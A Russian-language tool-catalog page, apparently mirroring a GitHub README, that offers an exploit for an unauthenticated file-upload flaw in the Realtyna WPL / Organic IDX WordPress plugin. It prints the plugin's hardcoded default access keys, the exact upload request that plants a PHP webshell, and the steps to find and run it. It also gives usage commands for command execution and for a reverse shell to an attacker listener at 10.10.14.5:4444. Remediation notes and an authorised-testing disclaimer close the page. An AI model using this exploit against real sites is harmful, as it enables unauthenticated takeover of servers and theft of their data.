Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-14483_exploit — Эксплойт для неаутентифицированной произвольной загрузки файлов в плагине Realtyna WPL/Organic IDX для WordPress, объединяет загрузку PHP-вебшелла с RCE, поддерживает режимы выполнения команд и reverse shell. | Kitploit
Инструменты/GitHubGitHub/0xdak/cve-2026-14483_exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеRed Teaming
GitHub0xdak/cve-2026-14483_exploit

CVE-2026-14483_exploit

Эксплойт для неаутентифицированной произвольной загрузки файлов в плагине Realtyna WPL/Organic IDX для WordPress, объединяет загрузку PHP-вебшелла с RCE, поддерживает режимы выполнения команд и reverse shell.

Репозиторий
15 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-14483 — Realtyna WPL / Organic IDX: неаутентифицированная произвольная загрузка файла → RCE

Неаутентифицированная произвольная загрузка файла, приводящая к RCE, в Realtyna WPL / Organic IDX — плагине WordPress (real-estate-listing-realtyna-wpl ≤ 5.2.0).

Плагин регистрирует "I/O-сервис" в публичном хуке init WordPress, доступный без аутентификации в корне сайта через ?wplview=io&wplformat=io. Единственный барьер — пара статических, жёстко прописанных ключей по умолчанию, поставляемых в миграциях плагина (одинаковых на каждой установке), при этом io_status включён по умолчанию:

root@kitploit:~
public_key  = U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w
private_key = Eft76bdh0o2uyhJkbG3T

Команда set_property (libraries/io/mobile_application/set_property.php → ) сохраняет загруженный с помощью и , поэтому -вебшелл можно разместить и выполнить от имени веб-пользователя.

wpl_file::upload
file[]
move_uploaded_file
без проверки расширения/MIME
.php
  • Затронуто: real-estate-listing-realtyna-wpl ≤ 5.2.0
  • Исправлено: 5.3.0 (уязвимая неаутентифицированная команда была удалена)
  • CWE: 434 (неограниченная загрузка файла опасного типа)
  • Воздействие: неаутентифицированный RCE от имени веб-пользователя (www-data)

Требования

Только стандартная библиотека Python 3 — без зависимостей.

Использование

root@kitploit:~
# run a command and print output
python3 exploit.py http://target/ -c id

# reverse shell (start a listener first: nc -lvnp 4444)
python3 exploit.py http://target/ --shell 10.10.14.5:4444

Как это работает

  1. Загрузка — POST /?wplview=io&wplformat=io&public_key=…&private_key=…&cmd=set_property&commands_directory=mobile_application&user_id=1 с multipart-полем file[] с именем image_<name>.php. Префикс image_ отбрасывается, поэтому файл сохраняется как <name>.php.
  2. Поиск — вебшелл попадает в wp-content/uploads/WPL/<pid>/<name>.php, где <pid> — это id объекта недвижимости, созданного запросом (ответ его не содержит). Инструмент перебирает небольшие id объектов, чтобы найти шелл.
  3. Выполнение — перейдите по адресу …/<name>.php?c=<cmd>.

Определение цели

Сайт на WordPress с активным плагином real-estate-listing-realtyna-wpl версии ≤ 5.2.0. Эндпоинт отвечает на GET /?wplview=io&wplformat=io (I/O-сервис плагина).

Устранение уязвимости

Обновите плагин до версии ≥ 5.3.0, проверяйте расширения/MIME загружаемых файлов, никогда не выполняйте PHP из wp-content/uploads и смените статические ключи I/O по умолчанию, используемые плагином.

Отказ от ответственности

Только для авторизованного тестирования безопасности и обучения. Используйте его только против систем, которыми вы владеете или имеете явное разрешение на тестирование.

Скачать инструмент